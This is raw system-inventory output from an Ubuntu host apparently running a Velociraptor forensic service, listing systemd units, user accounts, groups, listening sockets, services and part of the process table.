sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged QEMU_HARDDISK 1 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged QEMU_HARDDISK EFI\x20System\x20Partition sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged QEMU_HARDDISK 3 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device loaded active plugged QEMU_HARDDISK sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device loaded active plugged Virtio network device sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0 sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1 sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10 sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11 sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12 sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13 sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14 sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15 sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16 sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17 sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18 sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19 sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2 sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20 sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21 sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22 sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23 sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24 sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25 sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26 sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27 sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28 sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29 sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3 sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30 sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31 sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4 sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5 sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6 sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7 sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8 sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9 sys-devices-virtual-block-loop0.device loaded active plugged /sys/devices/virtual/block/loop0 sys-devices-virtual-block-loop1.device loaded active plugged /sys/devices/virtual/block/loop1 sys-devices-virtual-block-loop10.device loaded active plugged /sys/devices/virtual/block/loop10 sys-devices-virtual-block-loop11.device loaded active plugged /sys/devices/virtual/block/loop11 sys-devices-virtual-block-loop12.device loaded active plugged /sys/devices/virtual/block/loop12 sys-devices-virtual-block-loop13.device loaded active plugged /sys/devices/virtual/block/loop13 sys-devices-virtual-block-loop2.device loaded active plugged /sys/devices/virtual/block/loop2 sys-devices-virtual-block-loop3.device loaded active plugged /sys/devices/virtual/block/loop3 sys-devices-virtual-block-loop4.device loaded active plugged /sys/devices/virtual/block/loop4 sys-devices-virtual-block-loop5.device loaded active plugged /sys/devices/virtual/block/loop5 sys-devices-virtual-block-loop6.device loaded active plugged /sys/devices/virtual/block/loop6 sys-devices-virtual-block-loop7.device loaded active plugged /sys/devices/virtual/block/loop7 sys-devices-virtual-block-loop8.device loaded active plugged /sys/devices/virtual/block/loop8 sys-devices-virtual-block-loop9.device loaded active plugged /sys/devices/virtual/block/loop9 sys-devices-virtual-misc-rfkill.device loaded active plugged /sys/devices/virtual/misc/rfkill sys-devices-virtual-tty-ttyprintk.device loaded active plugged /sys/devices/virtual/tty/ttyprintk sys-module-configfs.device loaded active plugged /sys/module/configfs sys-module-fuse.device loaded active plugged /sys/module/fuse sys-subsystem-net-devices-ens18.device loaded active plugged Virtio network device -.mount loaded active mounted Root Mount boot-efi.mount loaded active mounted /boot/efi dev-hugepages.mount loaded active mounted Huge Pages File System dev-mqueue.mount loaded active mounted POSIX Message Queue File System proc-sys-fs-binfmt_misc.mount loaded active mounted Arbitrary Executable File Formats File System run-credentials-systemd\x2dsysusers.service.mount loaded active mounted /run/credentials/systemd-sysusers.service run-snapd-ns-firefox.mnt.mount loaded active mounted /run/snapd/ns/firefox.mnt run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount loaded active mounted /run/snapd/ns/snapd-desktop-integration.mnt run-snapd-ns.mount loaded active mounted /run/snapd/ns run-user-1000-doc.mount loaded active mounted /run/user/1000/doc run-user-1000-gvfs.mount loaded active mounted /run/user/1000/gvfs run-user-1000.mount loaded active mounted /run/user/1000 snap-bare-5.mount loaded active mounted Mount unit for bare, revision 5 snap-core22-2133.mount loaded active mounted Mount unit for core22, revision 2133 snap-core22-2139.mount loaded active mounted Mount unit for core22, revision 2139 snap-firefox-7084.mount loaded active mounted Mount unit for firefox, revision 7084 snap-firefox-7177.mount loaded active mounted Mount unit for firefox, revision 7177 snap-gnome\x2d42\x2d2204-202.mount loaded active mounted Mount unit for gnome-42-2204, revision 202 snap-gnome\x2d42\x2d2204-226.mount loaded active mounted Mount unit for gnome-42-2204, revision 226 snap-gtk\x2dcommon\x2dthemes-1535.mount loaded active mounted Mount unit for gtk-common-themes, revision 1535 snap-snap\x2dstore-1113.mount loaded active mounted Mount unit for snap-store, revision 1113 snap-snap\x2dstore-1216.mount loaded active mounted Mount unit for snap-store, revision 1216 snap-snapd-25202.mount loaded active mounted Mount unit for snapd, revision 25202 snap-snapd-25577.mount loaded active mounted Mount unit for snapd, revision 25577 snap-snapd\x2ddesktop\x2dintegration-178.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 178 snap-snapd\x2ddesktop\x2dintegration-315.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 315 sys-fs-fuse-connections.mount loaded active mounted FUSE Control File System sys-kernel-config.mount loaded active mounted Kernel Configuration File System sys-kernel-debug-tracing.mount loaded active mounted /sys/kernel/debug/tracing sys-kernel-debug.mount loaded active mounted Kernel Debug File System sys-kernel-tracing.mount loaded active mounted Kernel Trace File System acpid.path loaded active running ACPI Events Check cups.path loaded active running CUPS Scheduler systemd-ask-password-plymouth.path loaded active waiting Forward Password Requests to Plymouth Directory Watch systemd-ask-password-wall.path loaded active waiting Forward Password Requests to Wall Directory Watch whoopsie.path loaded active waiting Start whoopsie on modification of the /var/crash directory init.scope loaded active running System and Service Manager session-2.scope loaded active running Session 2 of User champuser accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant -.slice loaded active active Root Slice system-getty.slice loaded active active Slice /system/getty system-modprobe.slice loaded active active Slice /system/modprobe system-systemd\x2dfsck.slice loaded active active Slice /system/systemd-fsck system.slice loaded active active System Slice user-1000.slice loaded active active User Slice of UID 1000 user.slice loaded active active User and Session Slice acpid.socket loaded active running ACPID Listen Socket avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket cups.socket loaded active running CUPS Scheduler dbus.socket loaded active running D-Bus System Message Bus Socket podman.socket loaded active listening Podman API Socket snapd.socket loaded active running Socket activation for snappy daemon syslog.socket loaded active running Syslog Socket systemd-fsckd.socket loaded active listening fsck to fsckd communication Socket systemd-initctl.socket loaded active listening initctl Compatibility Named Pipe systemd-journald-audit.socket loaded active running Journal Audit Socket systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log) systemd-journald.socket loaded active running Journal Socket systemd-rfkill.socket loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch systemd-udevd-control.socket loaded active running udev Control Socket systemd-udevd-kernel.socket loaded active running udev Kernel Socket uuidd.socket loaded active listening UUID daemon activation socket swapfile.swap loaded active active /swapfile basic.target loaded active active Basic System cryptsetup.target loaded active active Local Encrypted Volumes getty-pre.target loaded active active Preparation for Logins getty.target loaded active active Login Prompts graphical.target loaded active active Graphical Interface local-fs-pre.target loaded active active Preparation for Local File Systems local-fs.target loaded active active Local File Systems multi-user.target loaded active active Multi-User System network-online.target loaded active active Network is Online network-pre.target loaded active active Preparation for Network network.target loaded active active Network nss-lookup.target loaded active active Host and Network Name Lookups nss-user-lookup.target loaded active active User and Group Name Lookups paths.target loaded active active Path Units remote-fs.target loaded active active Remote File Systems slices.target loaded active active Slice Units snapd.mounts-pre.target loaded active active Mounting snaps snapd.mounts.target loaded active active Mounted snaps sockets.target loaded active active Socket Units swap.target loaded active active Swaps sysinit.target loaded active active System Initialization time-set.target loaded active active System Time Set timers.target loaded active active Timer Units veritysetup.target loaded active active Local Verity Protected Volumes anacron.timer loaded active waiting Trigger anacron every hour apt-daily-upgrade.timer loaded active waiting Daily apt upgrade and clean activities apt-daily.timer loaded active waiting Daily apt download activities dpkg-db-backup.timer loaded active waiting Daily dpkg database backup timer e2scrub_all.timer loaded active waiting Periodic ext4 Online Metadata Check for All Filesystems fstrim.timer loaded active waiting Discard unused blocks once a week fwupd-refresh.timer loaded active waiting Refresh fwupd metadata regularly logrotate.timer loaded active waiting Daily rotation of log files man-db.timer loaded active waiting Daily man-db regeneration motd-news.timer loaded active waiting Message of the Day podman-auto-update.timer loaded active waiting Podman auto-update timer systemd-tmpfiles-clean.timer loaded active waiting Daily Cleanup of Temporary Directories update-notifier-download.timer loaded active waiting Download data for packages that failed at package install time update-notifier-motd.timer loaded active waiting Check to see whether there is a new version of Ubuntu available

List User Accounts
_apt
avahi
avahi-autoipd
backup
bin
champuser
colord
cups-pk-helper
daemon
dnsmasq
fwupd-refresh
games
gdm
geoclue
gnats
gnome-initial-setup
hplip
irc
kernoops
list
lp
mail
man
messagebus
news
nm-openvpn
nobody
proxy
pulse
root
rtkit
saned
speech-dispatcher
sssd
sudoadmin
sync
sys
syslog
systemd-network
systemd-oom
systemd-resolve
systemd-timesync
tcpdump
tss
usbmux
uucp
uuidd
whoopsie
www-data
-------------------------------- Networks opening
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 10.0.17.48:8001         0.0.0.0:*               LISTEN      721/velociraptor    
tcp        0      0 10.0.17.48:8003         0.0.0.0:*               LISTEN      721/velociraptor    
tcp        0      0 10.0.17.48:8889         0.0.0.0:*               LISTEN      721/velociraptor    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      381/systemd-resolve 
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      645/cupsd           
tcp6       0      0 ::1:631                 :::*                    LISTEN      645/cupsd           
tcp6       0      0 :::8000                 :::*                    LISTEN      721/velociraptor    
udp        0      0 127.0.0.53:53           0.0.0.0:*                           381/systemd-resolve 
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           491/avahi-daemon: r 
udp        0      0 0.0.0.0:51761           0.0.0.0:*                           491/avahi-daemon: r 
udp6       0      0 :::44447                :::*                                491/avahi-daemon: r 
udp6       0      0 :::5353                 :::*                                491/avahi-daemon: r 
raw6       0      0 :::58                   :::*                    7           496/NetworkManager  
--------------------------------- Local Groups Information
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,champuser
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:champuser
floppy:x:25:
tape:x:26:
sudo:x:27:champuser,sudoadmin
audio:x:29:pulse
dip:x:30:champuser
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:champuser
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
crontab:x:104:
messagebus:x:105:
systemd-timesync:x:106:
input:x:107:
sgx:x:108:
kvm:x:109:
render:x:110:
syslog:x:111:
_ssh:x:112:
tss:x:113:
bluetooth:x:114:
ssl-cert:x:115:
uuidd:x:116:
systemd-oom:x:117:
tcpdump:x:118:
avahi-autoipd:x:119:
netdev:x:120:
avahi:x:121:
lpadmin:x:122:champuser
rtkit:x:123:
whoopsie:x:124:
sssd:x:125:
fwupd-refresh:x:126:
nm-openvpn:x:127:
scanner:x:128:saned
saned:x:129:
colord:x:130:
geoclue:x:131:
pulse:x:132:
pulse-access:x:133:
gdm:x:134:
lxd:x:135:champuser
champuser:x:1000:
sambashare:x:136:champuser
sudoadmin:x:1001:
--------------------------------- services
  UNIT                                                  LOAD   ACTIVE SUB     DESCRIPTION
  accounts-daemon.service                               loaded active running Accounts Service
  acpid.service                                         loaded active running ACPI event daemon
  apparmor.service                                      loaded active exited  Load AppArmor profiles
  apport.service                                        loaded active exited  LSB: automatic crash report generation
  auditd.service                                        loaded active running Security Auditing Service
  avahi-daemon.service                                  loaded active running Avahi mDNS/DNS-SD Stack
  colord.service                                        loaded active running Manage, Install and Generate Color Profiles
  console-setup.service                                 loaded active exited  Set console font and keymap
  cron.service                                          loaded active running Regular background program processing daemon
  cups-browsed.service                                  loaded active running Make remote CUPS printers available locally
  cups.service                                          loaded active running CUPS Scheduler
  dbus.service                                          loaded active running D-Bus System Message Bus
  gdm.service                                           loaded active running GNOME Display Manager
  irqbalance.service                                    loaded active running irqbalance daemon
  kerneloops.service                                    loaded active running Tool to automatically collect and submit kernel crash signatures
  keyboard-setup.service                                loaded active exited  Set the console keyboard layout
  kmod-static-nodes.service                             loaded active exited  Create List of Static Device Nodes
  ModemManager.service                                  loaded active running Modem Manager
  networkd-dispatcher.service                           loaded active running Dispatcher daemon for systemd-networkd
  NetworkManager-wait-online.service                    loaded active exited  Network Manager Wait Online
  NetworkManager.service                                loaded active running Network Manager
  openvpn.service                                       loaded active exited  OpenVPN service
  packagekit.service                                    loaded active running PackageKit Daemon
  plymouth-quit-wait.service                            loaded active exited  Hold until boot process finishes up
  plymouth-read-write.service                           loaded active exited  Tell Plymouth To Write Out Runtime Data
  plymouth-start.service                                loaded active exited  Show Plymouth Boot Screen
  podman-restart.service                                loaded active exited  Podman Start All Containers With Restart Policy Set To Always
  polkit.service                                        loaded active running Authorization Manager
  power-profiles-daemon.service                         loaded active running Power Profiles daemon
  rsyslog.service                                       loaded active running System Logging Service
  rtkit-daemon.service                                  loaded active running RealtimeKit Scheduling Policy Service
  setvtrgb.service                                      loaded active exited  Set console scheme
  snapd.apparmor.service                                loaded active exited  Load AppArmor profiles managed internally by snapd
  snapd.seeded.service                                  loaded active exited  Wait until snapd is fully seeded
  snapd.service                                         loaded active running Snap Daemon
  switcheroo-control.service                            loaded active running Switcheroo Control Proxy service
  systemd-binfmt.service                                loaded active exited  Set Up Additional Binary Formats
  systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited  File System Check on /dev/disk/by-uuid/4015-7165
  systemd-journal-flush.service                         loaded active exited  Flush Journal to Persistent Storage
  systemd-journald.service                              loaded active running Journal Service
  systemd-logind.service                                loaded active running User Login Management
  systemd-modules-load.service                          loaded active exited  Load Kernel Modules
  systemd-oomd.service                                  loaded active running Userspace Out-Of-Memory (OOM) Killer
  systemd-random-seed.service                           loaded active exited  Load/Save Random Seed
  systemd-remount-fs.service                            loaded active exited  Remount Root and Kernel File Systems
  systemd-resolved.service                              loaded active running Network Name Resolution
  systemd-sysctl.service                                loaded active exited  Apply Kernel Variables
  systemd-sysusers.service                              loaded active exited  Create System Users
  systemd-timesyncd.service                             loaded active running Network Time Synchronization
  systemd-tmpfiles-setup-dev.service                    loaded active exited  Create Static Device Nodes in /dev
  systemd-tmpfiles-setup.service                        loaded active exited  Create Volatile Files and Directories
  systemd-udev-trigger.service                          loaded active exited  Coldplug All udev Devices
  systemd-udevd.service                                 loaded active running Rule-based Manager for Device Events and Files
  systemd-update-utmp.service                           loaded active exited  Record System Boot/Shutdown in UTMP
  systemd-user-sessions.service                         loaded active exited  Permit User Sessions
  udisks2.service                                       loaded active running Disk Manager
  ufw.service                                           loaded active exited  Uncomplicated firewall
  unattended-upgrades.service                           loaded active running Unattended Upgrades Shutdown
  upower.service                                        loaded active running Daemon for power management
  [email protected]                         loaded active exited  User Runtime Directory /run/user/1000
  [email protected]                                     loaded active running User Manager for UID 1000
  velociraptor.service                                  loaded active running Velociraprot linux amd64
  wpa_supplicant.service                                loaded active running WPA supplicant
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
63 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- List Processes
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 168036 12752 ?        Ss   11:08   0:08 /sbin/init splash
root           2  0.0  0.0      0     0 ?        S    11:08   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        S    11:08   0:00 [pool_workqueue_release]
root           4  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-rcu_g]
root           5  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-rcu_p]
root           6  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-slub_]
root           7  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-netns]
root          10  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/0:0H-events_highpri]
root          12  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-mm_pe]
root          13  0.0  0.0      0     0 ?        I    11:08   0:00 [rcu_tasks_kthread]
root          14  0.0  0.0      0     0 ?        I    11:08   0:00 [rcu_tasks_rude_kthread]
root          15  0.0  0.0      0     0 ?        I    11:08   0:00 [rcu_tasks_trace_kthread]
root          16  0.0  0.0      0     0 ?        S    11:08   0:00 [ksoftirqd/0]
root          17  0.0  0.0      0     0 ?        I    11:08   0:04 [rcu_preempt]
root          18  0.0  0.0      0     0 ?        S    11:08   0:00 [migration/0]
root          19  0.0  0.0      0     0 ?        S    11:08   0:00 [idle_inject/0]
root          20  0.0  0.0      0     0 ?        S    11:08   0:00 [cpuhp/0]
root          21  0.0  0.0      0     0 ?        S    11:08   0:00 [cpuhp/1]
root          22  0.0  0.0      0     0 ?        S    11:08   0:00 [idle_inject/1]
root          23  0.0  0.0      0     0 ?        S    11:08   0:00 [migration/1]
root          24  0.0  0.0      0     0 ?        S    11:08   0:00 [ksoftirqd/1]
root          26  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/1:0H-events_highpri]
root          29  0.0  0.0      0     0 ?        S    11:08   0:00 [kdevtmpfs]
root          30  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-inet_]
root          31  0.6  0.0      0     0 ?        S    11:08   3:21 [kauditd]
root          32  0.0  0.0      0     0 ?        S    11:08   0:00 [khungtaskd]
root          33  0.0  0.0      0     0 ?        S    11:08   0:00 [oom_reaper]
root          35  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-write]
root          36  0.0  0.0      0     0 ?        S    11:08   0:06 [kcompactd0]
root          38  0.0  0.0      0     0 ?        SN   11:08   0:00 [ksmd]
root          39  0.0  0.0      0     0 ?        SN   11:08   0:00 [khugepaged]
root          40  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-kinte]
root          41  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-kbloc]
root          42  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-blkcg]
root          43  0.0  0.0      0     0 ?        S    11:08   0:00 [irq/9-acpi]
root          44  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-tpm_d]
root          45  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-ata_s]
root          46  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-md]
root          47  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-md_bi]
root          48  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-edac-]
root          49  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-devfr]
root          50  0.0  0.0      0     0 ?        S    11:08   0:00 [watchdogd]
root          51  0.0  0.0      0     0 ?        I<   11:08   0:11 [kworker/0:1H-kblockd]
root          52  0.0  0.0      0     0 ?        S    11:08   0:06 [kswapd0]
root          53  0.0  0.0      0     0 ?        S    11:08   0:00 [ecryptfs-kthread]
root          55  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-kthro]
root          56  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-acpi_]
root          57  0.0  0.0      0     0 ?        S    11:08   0:00 [scsi_eh_0]
root          58  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-scsi_]
root          59  0.0  0.0      0     0 ?        S    11:08   0:00 [scsi_eh_1]
root          60  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-scsi_]
root          61  0.0  0.0      0     0 ?        S    11:08   0:00 [scsi_eh_2]
root          62  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-scsi_]
root          66  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-mld]
root          67  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-ipv6_]
root          76  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-kstrp]
root          78  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/u7:0]
root          79  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/u8:0]
root          80  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/u9:0]
root          94  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-charg]
root         113  0.0  0.0      0     0 ?        I<   11:08   0:11 [kworker/1:1H-kblockd]
root         146  0.0  0.0      0     0 ?        I    11:08   0:12 [kworker/u4:1-ext4-rsv-conversion]
root         181  0.1  0.0      0     0 ?        S    11:08   0:38 [jbd2/sda3-8]
root         182  0.0  0.0      0     0 ?        I<   11:08   0:00 [kworker/R-ext4-]
root         221  0.1  3.3 469244 203208 ?       S<s  11:09   0:50 /lib/systemd/systemd-journald
root         253  0.0  0.1  26888  6608 ?        Ss   11:09   0:00 /lib/systemd/systemd-udevd
root         306  0.0  0.0      0     0 ?        I<   11:09   0:00 [kworker/R-ttm]
root         308  0.0  0.0      0     0 ?        I<   11:09   0:00 [kworker/R-crypt]
systemd+     378  0.1  0.1  14836  6272 ?        Ss   11:09   0:49 /lib/systemd/systemd-oomd
systemd+     381  0.0  0.1  26464 10096 ?        Ss   11:09   0:01 /lib/systemd/systemd-resolved
systemd+     385  0.0  0.1  89388  6144 ?        Ssl  11:09   0:00 /lib/systemd/systemd-timesyncd
root         391  2.3  0.0  11872  2692 ?        S<sl 11:09  12:34 /sbin/auditd
